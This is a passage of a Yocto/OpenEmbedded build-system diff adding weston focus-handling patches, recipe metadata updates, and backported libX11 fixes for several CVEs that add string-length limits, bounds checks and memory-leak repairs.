+- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+- if (shsurf)
+- shell_surface_activate(shsurf);
+- }
++ /* FIXME: To be removed later. */
+ }
+
+ /* The surface will be inserted into the list immediately after the link
+@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ struct shell_surface *shsurf_child, *tmp;
+ struct weston_surface *surface =
+ weston_desktop_surface_get_surface(desktop_surface);
++ struct weston_seat *seat;
+
+ if (!shsurf)
+ return;
+@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ }
+ wl_list_remove(&shsurf->children_link);
+
++ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) {
++ struct shell_seat *shseat = get_shell_seat(seat);
++ /* activate() controls the focused surface activation and
++ * removal of a surface requires invalidating the
++ * focused_surface to avoid activate() use a stale (and just
++ * removed) surface when attempting to de-activate it. It will
++ * also update the focused_surface once it has a chance to run.
++ */
++ if (surface == shseat->focused_surface)
++ shseat->focused_surface = NULL;
++ }
++
+ wl_signal_emit(&shsurf->destroy_signal, shsurf);
+
+ if (shsurf->fullscreen.black_view)
+@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+ struct workspace *ws;
+ struct weston_surface *old_es;
+ struct shell_surface *shsurf, *shsurf_child;
++ struct shell_seat *shseat = get_shell_seat(seat);
+
+ main_surface = weston_surface_get_main_surface(es);
+ shsurf = get_shell_surface(main_surface);
+@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+
+ weston_view_activate(view, seat, flags);
+
++ if (shseat->focused_surface) {
++ struct shell_surface *current_focus =
++ get_shell_surface(shseat->focused_surface);
++ assert(current_focus);
++ shell_surface_deactivate(current_focus);
++ }
++
++ shseat->focused_surface = main_surface;
++ shell_surface_activate(shsurf);
++
+ state = ensure_focus_state(shell, seat);
+ if (state == NULL)
+ return;
+--
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston_8.0.0.bb b/meta/recipes-graphics/wayland/weston_8.0.0.bb
index 8fef864827..5e4e2032c9 100644
--- a/meta/recipes-graphics/wayland/weston_8.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_8.0.0.bb
@@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://weston.desktop \
file://xwayland.weston-start \
file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
+ file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \
+ file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \
+ file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \
"
SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3"
SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848"
@@ -70,7 +73,7 @@ PACKAGECONFIG[colord] = "-Dcolor-management-colord=true,-Dcolor-management-color
# Clients support
PACKAGECONFIG[clients] = "-Dsimple-clients=all -Ddemo-clients=true,-Dsimple-clients= -Ddemo-clients=false"
# Virtual remote output with GStreamer on DRM backend
-PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer-1.0"
+PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer1.0"
# Weston with PAM support
PACKAGECONFIG[pam] = "-Dpam=true,-Dpam=false,libpam"
# Weston with screen-share support
diff --git a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
index 65348c3762..baaf8fa9ad 100644
--- a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
+++ b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
@@ -1,4 +1,7 @@
SUMMARY = "Touchscreen calibration data from xinput-calibrator"
+DESCRIPTION = "A generic touchscreen calibration program for X.Org"
+HOMEPAGE = "https://www.freedesktop.org/wiki/Software/xinput_calibrator/"
+BUGTRACKER = "https://github.com/tias/xinput_calibrator/issues"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
index d2a16643fe..e524b82dd6 100644
--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
REQUIRED_DISTRO_FEATURES = "x11"
SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
-SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \
+SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
file://30xinput_calibrate.sh \
file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
file://0001-calibrator.hh-Include-string-to-get-std-string.patch \
diff --git a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
index 553840ddb8..685362ef15 100644
--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
PV = "2.99.917+git${SRCPV}"
S = "${WORKDIR}/git"
-SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel"
+SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
diff --git a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
index 1ea08a6c99..6a91582068 100644
--- a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
+++ b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
@@ -10,8 +10,10 @@ LIC_FILES_CHKSUM = "file://../misc/fonts.dir;md5=82a143d94d6a974aafe97132d2d519a
SRC_URI = "file://misc"
+SOURCE_DATE_EPOCH = "1613559011"
+
PE = "1"
-PR = "r2"
+PR = "r3"
inherit allarch features_check
@@ -27,6 +29,8 @@ RDEPENDS_${PN} += "font-alias"
do_install() {
install -d ${D}/${datadir}/fonts/X11/misc
install -m 0644 ${S}/* ${D}/${datadir}/fonts/X11/misc/
+ # Pick a date/time as otherwise it would be the git checkout/modify time
+ touch -d @1613559011 ${D}/${datadir}/fonts/X11/misc/*
install -d ${D}/${libdir}/X11
ln -sf ${datadir}/fonts/X11/ ${D}/${libdir}/X11/fonts -s
}
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
new file mode 100644
index 0000000000..97c4c17a8a
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
@@ -0,0 +1,333 @@
+From 5c539ee6aba5872fcc73aa3d46a4e9a33dc030db Mon Sep 17 00:00:00 2001
+From: Matthieu Herrb <matthieu@herrb.eu>
+Date: Fri, 19 Feb 2021 15:30:39 +0100
+Subject: [PATCH] Reject string longer than USHRT_MAX before sending them on
+ the wire
+
+The X protocol uses CARD16 values to represent the length so
+this would overflow.
+
+CVE-2021-31535
+
+Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
+
+https://lists.x.org/archives/xorg-announce/2021-May/003088.html
+
+XLookupColor() and other X libraries function lack proper validation
+of the length of their string parameters. If those parameters can be
+controlled by an external application (for instance a color name that
+can be emitted via a terminal control sequence) it can lead to the
+emission of extra X protocol requests to the X server.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8d2e02ae650f00c4a53deb625211a0527126c605]
+CVE: CVE-2021-31535
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ src/Font.c | 6 ++++--
+ src/FontInfo.c | 3 +++
+ src/FontNames.c | 3 +++
+ src/GetColor.c | 4 ++++
+ src/LoadFont.c | 4 ++++
+ src/LookupCol.c | 6 ++++--
+ src/ParseCol.c | 5 ++++-
+ src/QuExt.c | 5 +++++
+ src/SetFPath.c | 8 +++++++-
+ src/SetHints.c | 7 +++++++
+ src/StNColor.c | 3 +++
+ src/StName.c | 7 ++++++-
+ 12 files changed, 54 insertions(+), 7 deletions(-)
+
+diff --git a/src/Font.c b/src/Font.c
+index 09d2ae91..3f468e4b 100644
+--- a/src/Font.c
++++ b/src/Font.c
+@@ -102,6 +102,8 @@ XFontStruct *XLoadQueryFont(
+ XF86BigfontCodes *extcodes = _XF86BigfontCodes(dpy);
+ #endif
+
++ if (strlen(name) >= USHRT_MAX)
++ return NULL;
+ if (_XF86LoadQueryLocaleFont(dpy, name, &font_result, (Font *)0))
+ return font_result;
+ LockDisplay(dpy);
+@@ -662,8 +664,8 @@ int _XF86LoadQueryLocaleFont(
+
+ if (!name)
+ return 0;
+- l = strlen(name);
+- if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-')
++ l = (int) strlen(name);
++ if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-' || l >= USHRT_MAX)
+ return 0;
+ charset = NULL;
+ /* next three lines stolen from _XkbGetCharset() */
+diff --git a/src/FontInfo.c b/src/FontInfo.c
+index f870e431..51b48e29 100644
+--- a/src/FontInfo.c
++++ b/src/FontInfo.c
+@@ -58,6 +58,9 @@ XFontStruct **info) /* RETURN */
+ register xListFontsReq *req;
+ int j;
+
++ if (strlen(pattern) >= USHRT_MAX)
++ return NULL;
++
+ LockDisplay(dpy);
+ GetReq(ListFontsWithInfo, req);
+ req->maxNames = maxNames;
+diff --git a/src/FontNames.c b/src/FontNames.c
+index b78792d6..4dac4916 100644
+--- a/src/FontNames.c
++++ b/src/FontNames.c
+@@ -51,6 +51,9 @@ int *actualCount) /* RETURN */
+ register xListFontsReq *req;
+ unsigned long rlen = 0;
+
++ if (strlen(pattern) >= USHRT_MAX)
++ return NULL;
++
+ LockDisplay(dpy);
+ GetReq(ListFonts, req);
+ req->maxNames = maxNames;
+diff --git a/src/GetColor.c b/src/GetColor.c
+index cd0eb9f6..512ac308 100644
+--- a/src/GetColor.c
++++ b/src/GetColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -48,6 +49,9 @@ XColor *exact_def) /* RETURN */
+ XcmsColor cmsColor_exact;
+ Status ret;
+
++ if (strlen(colorname) >= USHRT_MAX)
++ return (0);
++
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms and i18n approach to Parse Color
+diff --git a/src/LoadFont.c b/src/LoadFont.c
+index f547976b..85735249 100644
+--- a/src/LoadFont.c
++++ b/src/LoadFont.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include "Xlibint.h"
+
+ Font
+@@ -38,6 +39,9 @@ XLoadFont (
+ Font fid;
+ register xOpenFontReq *req;
+
++ if (strlen(name) >= USHRT_MAX)
++ return (0);
++
+ if (_XF86LoadQueryLocaleFont(dpy, name, (XFontStruct **)0, &fid))
+ return fid;
+
+diff --git a/src/LookupCol.c b/src/LookupCol.c
+index f7f969f5..cd9b1368 100644
+--- a/src/LookupCol.c
++++ b/src/LookupCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,9 @@ XLookupColor (
+ XcmsCCC ccc;
+ XcmsColor cmsColor_exact;
+
++ n = (int) strlen (spec);
++ if (n >= USHRT_MAX)
++ return 0;
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms and i18n approach to Parse Color
+@@ -77,8 +81,6 @@ XLookupColor (
+ * Xcms and i18n methods failed, so lets pass it to the server
+ * for parsing.
+ */
+-
+- n = strlen (spec);
+ LockDisplay(dpy);
+ GetReq (LookupColor, req);
+ req->cmap = cmap;
+diff --git a/src/ParseCol.c b/src/ParseCol.c
+index e997b1b8..180132dd 100644
+--- a/src/ParseCol.c
++++ b/src/ParseCol.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,7 +47,9 @@ XParseColor (
+ XcmsColor cmsColor;
+
+ if (!spec) return(0);
+- n = strlen (spec);
++ n = (int) strlen (spec);
++ if (n >= USHRT_MAX)
++ return(0);
+ if (*spec == '#') {
+ /*
+ * RGB
+diff --git a/src/QuExt.c b/src/QuExt.c
+index 4e230e77..d38a1572 100644
+--- a/src/QuExt.c
++++ b/src/QuExt.c
+@@ -27,6 +27,8 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
++#include <stdbool.h>
+ #include "Xlibint.h"
+
+ Bool
+@@ -40,6 +42,9 @@ XQueryExtension(
+ xQueryExtensionReply rep;
+ register xQueryExtensionReq *req;
+
++ if (strlen(name) >= USHRT_MAX)
++ return false;
++
+ LockDisplay(dpy);
+ GetReq(QueryExtension, req);
+ req->nbytes = name ? strlen(name) : 0;
+diff --git a/src/SetFPath.c b/src/SetFPath.c
+index 60aaef01..3d8c50cb 100644
+--- a/src/SetFPath.c
++++ b/src/SetFPath.c
+@@ -26,6 +26,7 @@ in this Software without prior written authorization from The Open Group.
+
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
++#include <limits.h>
+ #endif
+ #include "Xlibint.h"
+
+@@ -48,7 +49,12 @@ XSetFontPath (
+ GetReq (SetFontPath, req);
+ req->nFonts = ndirs;
+ for (i = 0; i < ndirs; i++) {
+- n += safestrlen (directories[i]) + 1;
++ n = (int) ((size_t) n + (safestrlen (directories[i]) + 1));
++ if (n >= USHRT_MAX) {
++ UnlockDisplay(dpy);
++ SyncHandle();
++ return 0;
++ }
+ }
+ nbytes = (n + 3) & ~3;
+ req->length += nbytes >> 2;
+diff --git a/src/SetHints.c b/src/SetHints.c
+index bc46498a..f3d727ec 100644
+--- a/src/SetHints.c
++++ b/src/SetHints.c
+@@ -49,6 +49,7 @@ SOFTWARE.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include "Xatomtype.h"
+@@ -214,6 +215,8 @@ XSetCommand (
+ register char *buf, *bp;
+ for (i = 0, nbytes = 0; i < argc; i++) {
+ nbytes += safestrlen(argv[i]) + 1;
++ if (nbytes >= USHRT_MAX)
++ return 1;
+ }
+ if ((bp = buf = Xmalloc(nbytes))) {
+ /* copy arguments into single buffer */
+@@ -256,6 +259,8 @@ XSetStandardProperties (
+
+ if (name != NULL) XStoreName (dpy, w, name);
+
++ if (safestrlen(icon_string) >= USHRT_MAX)
++ return 1;
+ if (icon_string != NULL) {
+ XChangeProperty (dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+ PropModeReplace,
+@@ -298,6 +303,8 @@ XSetClassHint(
+
+ len_nm = safestrlen(classhint->res_name);
+ len_cl = safestrlen(classhint->res_class);
++ if (len_nm + len_cl >= USHRT_MAX)
++ return 1;
+ if ((class_string = s = Xmalloc(len_nm + len_cl + 2))) {
+ if (len_nm) {
+ strcpy(s, classhint->res_name);
+diff --git a/src/StNColor.c b/src/StNColor.c
+index 8b821c3e..ba021958 100644
+--- a/src/StNColor.c
++++ b/src/StNColor.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <stdio.h>
+ #include "Xlibint.h"
+ #include "Xcmsint.h"
+@@ -46,6 +47,8 @@ int flags) /* DoRed, DoGreen, DoBlue */
+ XcmsColor cmsColor_exact;
+ XColor scr_def;
+
++ if (strlen(name) >= USHRT_MAX)
++ return 0;
+ #ifdef XCMS
+ /*
+ * Let's Attempt to use Xcms approach to Parse Color
+diff --git a/src/StName.c b/src/StName.c
+index b4048bff..5a632d0c 100644
+--- a/src/StName.c
++++ b/src/StName.c
+@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
+ #ifdef HAVE_CONFIG_H
+ #include <config.h>
+ #endif
++#include <limits.h>
+ #include <X11/Xlibint.h>
+ #include <X11/Xatom.h>
+
+@@ -36,7 +37,9 @@ XStoreName (
+ Window w,
+ _Xconst char *name)
+ {
+- return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING,
++ if (strlen(name) >= USHRT_MAX)
++ return 0;
++ return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING, /* */
+ 8, PropModeReplace, (_Xconst unsigned char *)name,
+ name ? strlen(name) : 0);
+ }
+@@ -47,6 +50,8 @@ XSetIconName (
+ Window w,
+ _Xconst char *icon_name)
+ {
++ if (strlen(icon_name) >= USHRT_MAX)
++ return 0;
+ return XChangeProperty(dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
+ PropModeReplace, (_Xconst unsigned char *)icon_name,
+ icon_name ? strlen(icon_name) : 0);
+--
+2.32.0
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
new file mode 100644
index 0000000000..fb61195225
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
@@ -0,0 +1,58 @@
+From 8b51d1375a4dd6a7cf3a919da83d8e87e57e7333 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 2 Nov 2022 17:04:15 +0530
+Subject: [PATCH] CVE-2022-3554
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/1d11822601fd24a396b354fa616b04ed3df8b4ef]
+CVE: CVE-2022-3554
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+fix a memory leak in XRegisterIMInstantiateCallback
+
+Analysis:
+
+ _XimRegisterIMInstantiateCallback() opens an XIM and closes it using
+ the internal function pointers, but the internal close function does
+ not free the pointer to the XIM (this would be done in XCloseIM()).
+
+Report/patch:
+
+ Date: Mon, 03 Oct 2022 18:47:32 +0800
+ From: Po Lu <luangruo@yahoo.com>
+ To: xorg-devel@lists.x.org
+ Subject: Re: Yet another leak in Xlib
+
+ For reference, here's how I'm calling XRegisterIMInstantiateCallback:
+
+ XSetLocaleModifiers ("");
+ XRegisterIMInstantiateCallback (compositor.display,
+ XrmGetDatabase (compositor.display),
+ (char *) compositor.resource_name,
+ (char *) compositor.app_name,
+ IMInstantiateCallback, NULL);
+ and XMODIFIERS is:
+
+ @im=ibus
+
+Signed-off-by: Thomas E. Dickey's avatarThomas E. Dickey <dickey@invisible-island.net>
+---
+ modules/im/ximcp/imInsClbk.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/modules/im/ximcp/imInsClbk.c b/modules/im/ximcp/imInsClbk.c
+index 961aaba..0a8a874 100644
+--- a/modules/im/ximcp/imInsClbk.c
++++ b/modules/im/ximcp/imInsClbk.c
+@@ -204,6 +204,9 @@ _XimRegisterIMInstantiateCallback(
+ if( xim ) {
+ lock = True;
+ xim->methods->close( (XIM)xim );
++ /* XIMs must be freed manually after being opened; close just
++ does the protocol to deinitialize the IM. */
++ XFree( xim );
+ lock = False;
+ icb->call = True;
+ callback( display, client_data, NULL );
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
new file mode 100644
index 0000000000..855ce80e77
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
@@ -0,0 +1,38 @@
+From 8a368d808fec166b5fb3dfe6312aab22c7ee20af Mon Sep 17 00:00:00 2001
+From: Hodong <hodong@yozmos.com>
+Date: Thu, 20 Jan 2022 00:57:41 +0900
+Subject: [PATCH] Fix two memory leaks in _XFreeX11XCBStructure()
+
+Even when XCloseDisplay() was called, some memory was leaked.
+
+XCloseDisplay() calls _XFreeDisplayStructure(), which calls
+_XFreeX11XCBStructure().
+
+However, _XFreeX11XCBStructure() did not destroy the condition variables,
+resulting in the leaking of some 40 bytes.
+
+Signed-off-by: Hodong <hodong@yozmos.com>
+
+Upstream-Status: Backport from [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8a368d808fec166b5fb3dfe6312aab22c7ee20af]
+CVE:CVE-2022-3555
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/xcb_disp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/src/xcb_disp.c b/src/xcb_disp.c
+index 70a602f4..e9becee3 100644
+--- a/src/xcb_disp.c
++++ b/src/xcb_disp.c
+@@ -102,6 +102,8 @@ void _XFreeX11XCBStructure(Display *dpy)
+ dpy->xcb->pending_requests = tmp->next;
+ free(tmp);
+ }
++ xcondition_clear(dpy->xcb->event_notify);
++ xcondition_clear(dpy->xcb->reply_notify);
+ xcondition_free(dpy->xcb->event_notify);
+ xcondition_free(dpy->xcb->reply_notify);
+ Xfree(dpy->xcb);
+--
+2.18.2
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
new file mode 100644
index 0000000000..c724cf8fdd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
@@ -0,0 +1,111 @@
+From 304a654a0d57bf0f00d8998185f0360332cfa36c Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sat, 10 Jun 2023 16:30:07 -0700
+Subject: [PATCH] InitExt.c: Add bounds checks for extension request, event, &
+ error codes
+
+Fixes CVE-2023-3138: X servers could return values from XQueryExtension
+that would cause Xlib to write entries out-of-bounds of the arrays to
+store them, though this would only overwrite other parts of the Display
+struct, not outside the bounds allocated for that structure.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+CVE: CVE-2023-3138
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c.patch]
+Signed-off-by: Poonam Jadhav <poonam.jadhav@kpit.com>
+---
+ src/InitExt.c | 42 ++++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 42 insertions(+)
+
+diff --git a/src/InitExt.c b/src/InitExt.c
+index 4de46f15..afc00a6b 100644
+--- a/src/InitExt.c
++++ b/src/InitExt.c
+@@ -33,6 +33,18 @@ from The Open Group.
+ #include <X11/Xos.h>
+ #include <stdio.h>
+
++/* The X11 protocol spec reserves events 64 through 127 for extensions */
++#ifndef LastExtensionEvent
++#define LastExtensionEvent 127
++#endif
++
++/* The X11 protocol spec reserves requests 128 through 255 for extensions */
++#ifndef LastExtensionRequest
++#define FirstExtensionRequest 128
++#define LastExtensionRequest 255
++#endif
++
++
+ /*
+ * This routine is used to link a extension in so it will be called
+ * at appropriate times.
+@@ -242,6 +254,12 @@ WireToEventType XESetWireToEvent(
+ WireToEventType proc) /* routine to call when converting event */
+ {
+ register WireToEventType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (WireToEventType)_XUnknownWireEvent;
++ }
+ if (proc == NULL) proc = (WireToEventType)_XUnknownWireEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->event_vec[event_number];
+@@ -263,6 +281,12 @@ WireToEventCookieType XESetWireToEventCookie(
+ )
+ {
+ WireToEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (WireToEventCookieType)_XUnknownWireEventCookie;
++ }
+ if (proc == NULL) proc = (WireToEventCookieType)_XUnknownWireEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_vec[extension & 0x7F];
+@@ -284,6 +308,12 @@ CopyEventCookieType XESetCopyEventCookie(
+ )
+ {
+ CopyEventCookieType oldproc;
++ if (extension < FirstExtensionRequest ||
++ extension > LastExtensionRequest) {
++ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
++ extension);
++ return (CopyEventCookieType)_XUnknownCopyEventCookie;
++ }
+ if (proc == NULL) proc = (CopyEventCookieType)_XUnknownCopyEventCookie;
+ LockDisplay (dpy);
+ oldproc = dpy->generic_event_copy_vec[extension & 0x7F];
+@@ -305,6 +335,12 @@ EventToWireType XESetEventToWire(
+ EventToWireType proc) /* routine to call when converting event */
+ {
+ register EventToWireType oldproc;
++ if (event_number < 0 ||
++ event_number > LastExtensionEvent) {
++ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++ event_number);
++ return (EventToWireType)_XUnknownNativeEvent;
++ }
+ if (proc == NULL) proc = (EventToWireType) _XUnknownNativeEvent;
+ LockDisplay (dpy);
+ oldproc = dpy->wire_vec[event_number];
+@@ -325,6 +361,12 @@ WireToErrorType XESetWireToError(
+ WireToErrorType proc) /* routine to call when converting error */
+ {
+ register WireToErrorType oldproc = NULL;
++ if (error_number < 0 ||
++ error_number > LastExtensionError) {
++ fprintf(stderr, "Xlib: ignoring invalid extension error %d\n",
++ error_number);
++ return (WireToErrorType)_XDefaultWireError;
++ }
+ if (proc == NULL) proc = (WireToErrorType)_XDefaultWireError;
+ LockDisplay (dpy);
+ if (!dpy->error_vec) {
+--
+GitLab
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
new file mode 100644
index 0000000000..dbdf096fc8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
@@ -0,0 +1,63 @@
+From 6858d468d9ca55fb4c5fd70b223dbc78a3358a7f Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sun, 17 Sep 2023 14:19:40 -0700
+Subject: [PATCH libX11 1/5] CVE-2023-43785: out-of-bounds memory access in
+ _XkbReadKeySyms()
+
+Make sure we allocate enough memory in the first place, and
+also handle error returns from _XkbReadBufferCopyKeySyms() when
+it detects out-of-bounds issues.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0001-CVE-2023-43785-out-of-bounds-memory-access-in-_XkbRe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/6858d468d9ca55fb4c5fd70b223dbc78a3358a7f]
+CVE: CVE-2023-43785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xkb/XKBGetMap.c | 14 +++++++++-----
+ 1 file changed, 9 insertions(+), 5 deletions(-)
+
+diff --git a/src/xkb/XKBGetMap.c b/src/xkb/XKBGetMap.c
+index 2891d21e..31199e4a 100644
+--- a/src/xkb/XKBGetMap.c
++++ b/src/xkb/XKBGetMap.c
+@@ -182,7 +182,8 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ if (offset + newMap->nSyms >= map->size_syms) {
+ register int sz;
+
+- sz = map->size_syms + 128;
++ sz = offset + newMap->nSyms;
++ sz = ((sz + (unsigned) 128) / 128) * 128;
+ _XkbResizeArray(map->syms, map->size_syms, sz, KeySym);
+ if (map->syms == NULL) {
+ map->size_syms = 0;
+@@ -191,8 +192,9 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ map->size_syms = sz;
+ }
+ if (newMap->nSyms > 0) {
+- _XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
+- newMap->nSyms);
++ if (_XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
++ newMap->nSyms) == 0)
++ return BadLength;
+ offset += newMap->nSyms;
+ }
+ else {
+@@ -222,8 +224,10 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+ newSyms = XkbResizeKeySyms(xkb, i + rep->firstKeySym, tmp);
+ if (newSyms == NULL)
+ return BadAlloc;
+- if (newMap->nSyms > 0)
+- _XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms);
++ if (newMap->nSyms > 0) {
++ if (_XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms) == 0)
++ return BadLength;
++ }
+ else
+ newSyms[0] = NoSymbol;
+ oldMap->kt_index[0] = newMap->ktIndex[0];
+--
+2.39.3
+
